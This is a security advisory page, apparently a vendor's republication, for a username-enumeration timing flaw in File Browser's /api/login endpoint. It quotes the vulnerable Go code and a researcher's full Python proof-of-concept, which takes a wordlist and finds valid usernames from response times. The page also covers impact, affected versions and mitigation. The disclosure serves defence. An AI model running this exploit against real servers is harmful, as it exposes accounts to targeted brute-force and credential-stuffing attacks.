GHSA-43mm-m3h2-3prc
MEDIUMFile Browser Vulnerable to Username Enumeration via Timing Attack in /api/login
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
github.com/filebrowser/filebrowser🐹github.com/filebrowser/filebrowser/v2Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.
Description
Summary
The JSONAuth.Auth function contains a logic flaw that allows unauthenticated attackers to enumerate valid usernames by measuring the response time of the /api/login endpoint.
Details
The vulnerability exists due to a "short-circuit" evaluation in the authentication logic. When a username is not found in the database, the function returns immediately. However, if the username does exist, the code proceeds to verify the password using bcrypt (users.CheckPwd), which is a computationally expensive operation designed to be slow.
This difference in execution path creates a measurable timing discrepancy:
Invalid User: ~1ms execution (Database lookup only). Valid User: ~50ms+ execution (Database lookup + Bcrypt hashing).
In auth/json.go:
// auth/json.go line 54
u, err := usr.Get(srv.Root, cred.Username)
// VULNERABILITY:
// If 'err != nil' (User not found), the OR condition short-circuits.
// The second part (!users.CheckPwd) is NEVER executed.
//
// If 'err == nil' (User found), the code MUST execute users.CheckPwd (Bcrypt).
if err != nil || !users.CheckPwd(cred.Password, u.Password) {
return nil, os.ErrPermission
}
PoC
The following Python script automates the attack. It first calibrates the network latency using random (non-existent) users to establish a baseline/threshold, and then tests a list of target usernames. Valid users are detected when the response time exceeds the calculated threshold.
import requests
import time
import random
import string
import statistics
import argparse
CALIBRATION_SAMPLES = 20
ENDPOINT = "/api/login"
def generate_random_user(length=10):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
def measure_response_time(url, username):
start = time.perf_counter()
try:
requests.post(url, json={"username": username, "password": "dummy_pass_123!"})
except Exception as e:
print(f"[!] Connection error: {e}")
return 0
return time.perf_counter() - start
def calibrate(url):
print(f"\n[*] Calibrating with {CALIBRATION_SAMPLES} random users...")
times = []
print(" Progress: ", end="", flush=True)
for _ in range(CALIBRATION_SAMPLES):
random_user = generate_random_user()
elapsed = measure_response_time(url, random_user)
times.append(elapsed)
print(".", end="", flush=True)
print(" OK")
mean = statistics.mean(times)
try:
stdev = statistics.stdev(times)
except:
stdev = 0.0
threshold = mean + (5 * stdev) + 0.005
print(f" - Mean time (invalid users): {mean:.4f}s")
print(f" - Standard deviation: {stdev:.6f}s")
print(f" - Threshold set: {threshold:.4f}s")
return threshold
def load_wordlist(wordlist_path):
try:
with open(wordlist_path, 'r', encoding='utf-8') as f:
users = [line.strip() for line in f if line.strip()]
return users
except FileNotFoundError:
print(f"[!] Wordlist not found: {wordlist_path}")
exit(1)
except Exception as e:
print(f"[!] Error reading wordlist: {e}")
exit(1)
def timing_attack(url, threshold, users):
print(f"\n[*] Testing {len(users)} users from wordlist...")
print("-" * 50)
print(f"{'Username':<15} | {'Time':<10} | {'Status'}")
print("-" * 50)
found = []
for user in users:
elapsed = measure_response_time(url, user)
if elapsed > threshold:
status = ">> VALID <<"
found.append(user)
else:
status = "invalid"
print(f"{user:<15} | {elapsed:.4f}s | {status}")
return found
def main():
parser = argparse.ArgumentParser(description='FileBrowser timing attack exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., http://localhost:8080)')
parser.add_argument('-w', '--wordlist', required=True, help='Path to wordlist file')
args = parser.parse_args()
target_url = args.url.rstrip('/') + ENDPOINT
print("=== FILEBROWSER TIMING ATTACK ===\n")
print(f"[*] Target: {target_url}")
print(f"[*] Wordlist: {args.wordlist}")
try:
threshold = calibrate(target_url)
users = load_wordlist(args.wordlist)
print(f"\n[*] Loaded {len(users)} users from wordlist")
print("[*] Starting attack...")
valid_users = timing_attack(target_url, threshold, users)
print("\n" + "="*50)
print(f"SUMMARY: {len(valid_users)} valid users found")
if valid_users:
for u in valid_users:
print(f" -> {u}")
print("="*50)
except KeyboardInterrupt:
print("\n[!] Attack cancelled")
if __name__ == "__main__":
main()
For example, in this case, I have guchihacker as the only valid user in the application. <img width="842" height="310" alt="image" src="https://github.com/user-attachments/assets/b3caf11e-279c-4532-aa96-fd20cda153a3" />
I am going to use the exploit to list valid users. <img width="628" height="716" alt="image" src="https://github.com/user-attachments/assets/f9d93e8e-e773-42a5-8a06-bc6bcc2a71fa" /> As we can see, the user guchihacker has been confirmed as a valid user by comparing the server response time.
Impact
An unauthenticated remote attacker can enumerate valid usernames. This significantly weakens the security posture by facilitating targeted brute-force attacks or credential stuffing against specific, known-valid accounts (e.g., 'admin', 'root', employee names).
I remain at your disposal for any questions you may have on this matter. Thank you very much.
Sincerely, Felix Sanchez (GUCHI)
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐹Go | github.com/filebrowser/filebrowser | all versions | No fix |
| 🐹Go | github.com/filebrowser/filebrowser/v2 | all versions | 2.55.0 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/filebrowser/filebrowser. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
No patched version of github.com/filebrowser/filebrowser has shipped for GHSA-43mm-m3h2-3prc yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-43mm-m3h2-3prc is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-43mm-m3h2-3prc. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-43mm-m3h2-3prc in your dependencies?
O3 detects GHSA-43mm-m3h2-3prc across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.